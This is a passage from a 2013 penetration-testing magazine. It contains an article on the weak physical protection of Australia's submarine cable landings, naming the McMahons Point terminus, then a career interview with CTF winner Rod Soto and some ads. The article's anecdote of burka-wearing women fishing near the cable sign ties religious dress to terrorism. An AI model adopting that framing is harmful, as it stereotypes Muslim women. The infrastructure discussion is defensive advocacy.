all coming into the same unsecured area (Figure 1).
Considering the statement from the Australian
Communications and Media Authority (ACMA) of
the submarine cable links being a “vital part of our
national infrastructure”, and the maintenance of two
maritime protection zones around the connections
into Sydney and the additional zone around Perth
the impression would be that these cables were
heavily guarded, with consideration for protection
and resilience at all points. This is not the case.
Whilst working in Sydney and looking into overall
resilience for the Australian components of a global system the author visited one of the cable terminuses at McMahons Point in Sydney. The pro-

Figure 1. Submarine Cable Connections into Australia
StartKit 01/2013(01)

Page 59

http://pentestmag.com

LET'S TALK ABOUT SECURITY
tection consisted of a bright yellow sign warning
that the cable was present – nothing more. See the
picture below. So, it appears that the hope is that
polite terrorists will take note of the word “Caution”.
Ironically, the author did get a picture that he has
not included because it would appear to be racially
motivated, but on one occasion he found two women in full burkas, thus hiding their identity, fishing
in front of the sign – showing how easy unfettered
access is. The McMahons Point ferry terminal is
beside the tree on the right corner of the picture,
showing how well thought out the maritime protection policy is (Figure 2).

Risk of Failure and Terrorism

The point of this paper is to highlight two types of
risk. Whilst there is capacity to spare on the current connectivity into Australia, the connections
into a common unprotected area (Paddington in
New South Wales, for example) does represent
a risk of acts of God, dragged anchors, or terrorism. The slow down due to reduced capacity if the
east coast connections were lost would force all
traffic to exit the country via Perth, and in country
connections and the external connection are unlikely to be able to cope. This would lead to use of
the satellite links and higher up the software stack
there would be failures; eventually leading to timeouts, a backing up of traffic in financial transactions, and a major financial impact or ruin for companies or even the country depending on how long
the problem existed.
This isn’t just a problem for the nation as a whole,
but is something that must be considered in application and infrastructure design for global systems. Latency must be considered when siting web
channels for distributed systems; particularly where
frameworks that use the codebehind architecture
(for example, JSP, ASP.NET, etc) to minimise client

Figure 2. McMahons Point Submarine Cable Terminus
– Sydney
StartKit 01/2013(01)

and browser dependencies and use server side processing are in use. Thus, a web front end should be
sited in region to avoid latency issues when tabbing
between fields. However, when that calls to middle
or back end tiers a latency hit of several seconds
could lead to the application being unusable from
a user perspective or even just failing completely
due to timeouts; so satellite backup for submarine
cables with unpredictable behaviour or long latency
is not a real option except to supplement the existing cable network.
What will happen when national broadband network is rolled out? Well, much of the existing web
traffic and telephony usage is in country; but so
much of the foreign connectivity is key (foreign
payments, travel, international finance exchange,
web searches, etc) that the impact of its loss would
be a major problem.
So, when doing penetration testing – which is all
about making sure confidentiality and integrity are
covered from a security point of view but availability is considered, thought must be given to the impact of latency under normal conditions, abnormal
high traffic conditions due to connectivity issues,
and complete failure of the connections. These
can cause failure of the application or invocation of
the disaster recovery procedures.
One of the techniques that is not often used, but
which is very effective, is failure mode event analysis (FMEA) – a tool borrowed from the aircraft industry. In this, events are talked through to work
out what would happen when a failure occurs; using the whole stack end to end. In this, it has often been found that the combination of high availability solutions can result in such an increase in
complexity and unpredictable behaviour that availability is reduced. When doing FMEA on a global system the increased latency or failure of international connectivity must be considered and the
way the system will behave on failure and recovery understood and catered for. The impact on the
system and the owning company may be significant. However, what about the wider impact?
Australia is a successful country, as well as being
a beautiful and friendly one, but without communications to the outside world the financial and social
impact would be enormous. Having five connections into the same area of the nation with only one
older alternative on the other side of the country is
an enormous risk. When the national broadband
network initiative delivers the increased bandwidth
requirements makes recovery even harder, so increasing the risk.

Page 60

http://pentestmag.com

What Should be Done?

The first steps to protecting the nation, and the applications that run in it, is to protect the existing
cables coming into the country. A sign informing
potential terrorists and nothing else is not exactly
adequate protection. In Egypt activist scuba divers tried to cut and destroy the cables. So, a genuine protective area from maritime attack is needed
– although this would be difficult in an area as busy
as Sydney harbour! However, at the very least the
connection transition onto land should be secured,
with barbed wire and monitoring; and a large sign
probably wouldn’t be advisable. Having the majority of the connections so important to the country
coming into the same place is also ill advised.
Additional connections into Australia, coming
into a different location than Sydney on the east
coast; along with additional connections on the
west coast are desperately required – along with
the acceptance that satellite connectivity is not a
real answer due to the latency, which will cause
timeouts and failures higher up the software stack.

Conclusion

Security assessments aren’t only about confidentiality and integrity, but about availability as well –
forming the CIA triad – and in a global system that
must include an understanding of the oceanic links
into a country. With Australia there are five connections into one area on one side of the country
and one into the other side, and these connections
are not well protected – which leads to a considerable risk from both accidental damage and terrorism. This would not just cripple a global distributed
system, but the country as a whole. The increased
latency of satellite links means that these are not a
suitable backup solution, so new connections elsewhere into the country are needed.

Colin Renouf

Colin Renouf is a long standing enterprise solutions architect with thirty years experience in the industry –
concentrating on the finance sector. He has authored
many magazine articles ranging from Unix, through Java and on to security; and has also written and contributed to books on the subject. He is currently contracting
for a well known credit card company, but his main loves
are Australia and some of its people, singing, photography and just being with good company. Oh, and quantum physics as he is an eternal scientist.
StartKit 01/2013(01)

interview

Interview
with Rod Soto
Rod Soto is a security
researcher and board member
of HackMiami. He is a regular
speaker at hacking conferences
all over the country on the topics
of penetration testing tools and
methods, as well as the topic of
digital civil liberties. Rod Soto
was the winner of the 2012 Black
Hat Las Vegas Capture the Flag
hacking competition, and is the
founder and lead developer
of the Kommand&&Kontrol
competitive hacking tournament
series. He is currently a senior
security engineer with the
emergency response team of an
information security corporation
engaged in digital crime
intelligence analysis, vulnerability
assessments, penetration testing,
and malware reversal.

StartKit 01/2013(01)

Page 62

http://pentestmag.com

You won the Black Hat hacking
competition last year. How were you
preparing for this competition? Is there
any way to prepare? What advice you
would give to those who would like to try
themselves in such competition?

It was not easy and it took a lot of effort. I advise
those who want to get better at playing CTFs to
play as many as they can, save and follow write
ups of those challenges you couldn't get and study
and research as much as you can. Create your
own lab and create challenges.

How do you improve your skills?
Do you have any methods that have
proven to be more effective than
others? Could you share some with our
readers?

Improving your skills depends on your dedication
and willingness to learn new things. You need to
be up to date and willing to learn new technologies
and techniques that may not be easy at first and
that require studying hard.

Why did you choose Information Security
field for your profession instead of other
Information Technology domains?

My background is mainly in system architecture,
integration and administration. Throughout the
years I became more focused on Information Security as it became more significant in the organizations I was working for, plus I always thought
of information security as a very challenging and
changing industry.

What do you consider so challenging in
the field of Information Security? It seems
that you have a thing for competitions, is
this it or something else as well?:)

I do... :) It is a way of challenging myself to learn
new things and to face and adapt to unknown scenarios.

What were the biggest challenges that
you have ever experienced in the past,
especially when you worked as a Junior
Information Security professional?

Mostly access to the right information, I started
becoming more knowledgeable as I started networking with colleagues, going to conferences and
visiting hackerspaces. In many aspects of infosec
you pretty much have to become an autodidact.
You have to put in time, discipline and persistence
StartKit 01/2013(01)

to learn completely new things and in many cases
with a high level of dificulty.

Do you have any suggestions for our
readers? Especially for those who would
like to become pentesters?

There are many books you can read or courses you can take but in reality you need a base
knowledge and understanding in networking,
operating systems, programming/scripting languages, application vulnerabilities and finally
exploit creation even if you will never create one
yourself.

Are there any specific personality traits
that one should have in order to achieve
success? What personality features are
valued in this job?

Like many jobs I believe patience, persistence, tolerance to frustration, a strong work ethic and ability to adapt to change are fundamental personality
traits needed to be successful.

What are the top 5 challenges for the
junior IT professional who would like to
learn and master skills in Information
Security?






Orientation on career direction
Efficient learning habits
Mentorship
Financial Aid
Time

Sounds like a good plan, but how to find a
mentor? How did you found yours?

I am mostly self taught. I did take some courses
and read lots of books but as far as a mentor – I
have never had one nor do I have one now. I did
find lots of help by attending a local hackerspace
HackMiami and I met some great people at DEFCON. Basically going into the community helped
me a lot when I was trying to learn new things.
Finding a mentor is not easy but there are certainly people in the community that are willing to help
newcomers. We do that at HackMiami.

Could you give few examples of learning
habits that appeared to be efficient in
your case? Maybe this will inspire our
readers to look for their own...

I read at least one relevant book per month, I recreate as many vulnerabilities as I can as they are

Page 63

http://pentestmag.com

interview
published in my own lab. If I find I need to learn further about certain application or technology I then
research about white papers, books and authors.

On the basis of your experience and
expertise, what is the best methodology
for learning and mastering Information
Security?

Patience, persistence, discipline and the ability to
tolerate frustration. This is not a field for the faint
of heart.

How is the career path for being
Information Security professional in terms
of salary and position? Is the Information
Security professional career path more
promising and better than other IT
professions?

Right now it is. the Information Security job market
is dominated by employees. There are simply not
enough people and there probably won't be for the
near future. Financially speaking It is definitely one
of the best places to be in the IT industry. As a career it has also become a very relevant and challenging field, but as with any industry one should
not rely on it for unsubstantiated longevity.

What are the best pentesting tools in your
opinion? Could you recommend some to
our readers?

I am metasploit kind of guy but I always try to replicate vulnerabilities and exploits without using it.
I think burp and acutenetix are great webscanners and of course there are plenty of open source
tools. I look at pentesting as mix and match. I always have to be prepared to think outside the box
and try new tools some of them I have to learn on
the run.

What are your favorite methods for
penetration tests? The ones you consider
the most effective? Do you have a set with
which you start each task?

Know your target very well and your tools and the
rest will follow. Take your time to footprint, analyze
and understand the environment you are probing.
There are no "one" clicks.

What does HackMiami do? Is it a
Information Security platform/group for
Information Security minded people?

HackMiami is hackerspace based in Miami, FL. It
is composed of mostly information security profesStartKit 01/2013(01)

sionals and we focus on information security research and education. We also have a maker wing
that focuses on open source robotics and general
maker projects.

This maker wing sounds great.
Could you tell us more about it?
On what projects you are working on
now?

Current projects are: Un-maned submarine, Micro drones, Fighting robots. Here is a video of the
quadcopter built by one of our members: http://
www.youtube.com/watch?v=qn9Eq1mJ6Ks.

Could you describe one of the completed
and successful projects of this open
source section?
See quadcopter video.

There are some areas that don't have such
a nice initiative like HackMiami yet. Is it
hard to establish a hackerspace? What
things are required?

It is not easy. There are many challenges starting from financial support, potential liability and
dealing with many different personalities. At the
end of the day it depends on people's willingness
to participate and support the hackerspace. You
can always find a place to meet but if people are
not showing up or participating then you won't get
very far.

Malware, trojan as well as the latest
cyber attacks are often ahead and
unpredictable compared with most of
the information security technology and
tools. What suggestions do you have
to prevent and minimize these kind of
attacks?

I do believe that offense must drive defense. Understanding, analyzing, reversing and using malicious tools in your own lab environment will provide you the ability to visualize malicious attacker's
mindset and preferred attack vectors. You can
never be 100% secure but you can minimize and
mitigate potential threats by keeping yourself up to
date on tools, vulnerabilities and doing your own
research, not only technical but also using open
source intelligence tools.

Could you recommend some good links
or reads about creating your own lab
environment?

Page 64

http://pentestmag.com

There are 3 books that
will get you started in my
opinion. One of then is
Metasploit the Pentester
Guide. Second is Professional Penetration Testing
and third I would recommend the Web Application
Hacker's Handbook.

ficult to prove. There are
many methods and tools
though that may give you a
certain level of confidence
that an attack came from
a specific source. Again
there will be a level of uncertainty. As to how an organization or country deals
with that level of uncertainty would depend on their
own policies and rules of
engagement.

How should one
proceed with their
own research? Could
you give some tips
for those who haven't
done it yet?

What is the most
dangerous,
unpredictable and
untraceable cyber
attacks that happened
in the past few years
based from your
experience? Which
industry was the main
target of this kind of
attack?

Set up your lab. It does not
cost much but it is important to have your own environment where you can experiment and break things
without getting in trouble.
You can use some of the
open source hypervisors
and operating systems
publicly available on the internet.

I have seen attacks directed to certain industries
such as financial, infrastructure and major corporations. I definitely believe
that SCADA infrastructure
attacks are the most potentially dangerous attacks
and the ones that may likely cause human casualties. I am not aware such
event has happened yet,
although governments and
military contractors are
training for these types of
attack scenarios, both offensive and defensive. If a
large scale SCADA attack
takes place that results in
loss of life, the most likely culprit would be a state
sponsored attack.

What are best open
source intelligence
tools in your opinion?
I think our readers will
be interested in this
very much.

In my opinion those tools
have yet to be developed.
I have experimented with
some commercial and
open source tools and I
do not think they are at the
right place yet. There is a
lot of work to be done in
this area.

If there were cyber
attacks targeted a
specific destination at
the specific country,
would that be possible
to trace back the
attacker(s) accurately?

How did it happen
you became a founder
and developer of
competitive hacking
tournament series?

Attribution is always very
challenging and very difStartKit 01/2013(01)

Page 65

http://pentestmag.com

interview
I wanted an excuse to hang out with my friends
and party doing what we love the most :). I thought
it was cool to travel and do it in different places with
different people and make it fun and challenging.

What was your objective to form
Kommand && KonTroll competitive
hacking tournament series?

Kommand && KonTroll is a computer security
competition in a private environment where players are faced with different challenges. Most of
those challenges are web based or infrastructure.
We also have some binary reversal challenges,
but that is not our focus. We try to make it as
close to the "trenches" as we can, as we try to
give players a view of the underground. We use
publicly available software and vulnerabilities, or
we modify targets to be vulnerable. The game also implies defense as players are allowed to attack other players. This game allows players to
learn, experiment and practice with many information security tools and wares that they would
otherwise not be able to use or work with at their
current organizations.

How do you prepare the tasks for such
tournament? Does it take long? Where
you are searching for inspiration?

Yes it takes long... between 100 to 150 hours. I do
heavy research on scenarios, cultures, characters,
personalities, music, videos, history and real life
scenarios. Every challenge tells a story, in some
instances challenges could branch into whole new
ctf. I try to make it relevant and I try to make it fun.
I distribute challenges difficulty level in a way that
allows players with different skills to be able to play
and win the ctf.

You are involved in digital crime
intelligence analysis, can you tell us more
about it?
I can't without breaking my NDA. Sorry.

Cloud Computing and Virtualization
technologies are getting more
popular day by day. Do you think both
technologies might be a new target
for cyber attacks? Have you ever
discovered the latest attack techniques
done by attackers in Cloud Computing
environment?

believe that those technologies change attack
methodologies I believe they simply add more
attack surface and possible single points of failure for many organizations. Organizations must
be careful of putting all their eggs in the "cloud",
I myself have been involved in situations where
cloud outages presented a level of availability
that organizations were simply not willing to tolerate.

You give talks about digital civil liberties...
What are the biggest threats in this area
for computer users and mostly for security
specialists and pentesters?
I gave a talk at DEFCON XX Skytalks along with
some of my colleagues where we warned that regulation of such tools was not farfetched, and the
need to address these tools as a right for law abiding citizens to research, study and to defend themselves. It does look though we are marching towards more regulation and possibly strict limitation
and even prohibition like in some countries.

As far as digital civil liberties are
concerned, what is your opinion about
“hacktivism”? Is it a good way to prove
the politicians wrong?

I am all for the right of people to dissent and protest as long as they do not break the law.

Do you have any plan to setup your own
Information Security company in the
future?

I have my own IT company called EITS and I also
do work with with Information Security Services,
Inc out of Miami, FL

Can you tell us few words about EITS?
How it started and what kind of solutions/
products it offers?

My work was mostly system administration and
support. It is now more towards security assessments and penetration testing.
Thank you Rod for this interview.
By PenTest Team

I do believe those technologies definitely introduce new risks and vectors of attacks. I do not
StartKit 01/2013(01)

Page 66

http://pentestmag.com

Cyber Security Industry Transaction Map 2004-2013

Our Role

Our Advantage

Delling Advisory is a boutique advisory
firm, providing merger and acquisition
related consulting, advisory and
transactional services to companies in the
information security industry.

We have unsurpassed industry knowledge
built through a successful career in the
information security market in Australia,
and as a principal in transactions buying,
merging, and selling companies in the
information security industry.

www.dellingadvisory.com

www.dellingadvisory.com/blog (Research)

Summer
School
TecnoCampus
Barcelona
Summer
School
TecnoCampus
SUMMER SCHOOL
PROGRAMMES
8 - 19 JULY 2013

twO-wEEk COURSES witH EnGLiSH tUitiOn And COMPLEMEntEd
witH SOCiAL, CULtURAL, SPORt And LEiSURE ACtivitiES

Summer CourSe on InformatIon teChnologIeS (It) 1

Summer CourSe on renewable energIeS

Summer CourSe on InformatIon teChnologIeS (It) 2

Summer CourSe on buSIneSS admInIStratIon

Summer CourSe on VIdeo and muSIC

Summer CourSe on tourISm

Summer CourSe on CInema

Summer CourSe on InternatIonal health

Our prOgramme includes:








Tuition in english
attendance certificate issued by the university
access to our state-of-the-art facilities
library access
cultural experience
local sport centres and facilities
Bus transport from and to Barcelona airport,
if travelling in group or at agreed times

This academic program will be complemented with a culture,
social and leisure program (optional)

email: [email protected]
tel.: Juan garcía on 00 34 93 169 65 32
tecnocampus.cat/summerschool

Securing the Future in the Cyber Domain
NATIONAL SECURITY

Trust. Inform. Protect.
SAIC is helping secure the future by delivering trusted technology, advanced cybersecurity
operations and actionable intelligence solutions.
By empowering our customers with innovative advanced data management solutions
that inform and protect in real time, SAIC helps provide our customers with a competitive
advantage in the cyber domain.
Learn more at saic.com/cybersecurity

© SAIC. All rights reserved.

NYSE: SAI

Sponsor Documents

Or use your account on DocShare.tips

Hide

Forgot your password?

Or register your new account on DocShare.tips

Hide

Lost your password? Please enter your email address. You will receive a link to create a new password.

Back to log-in

Close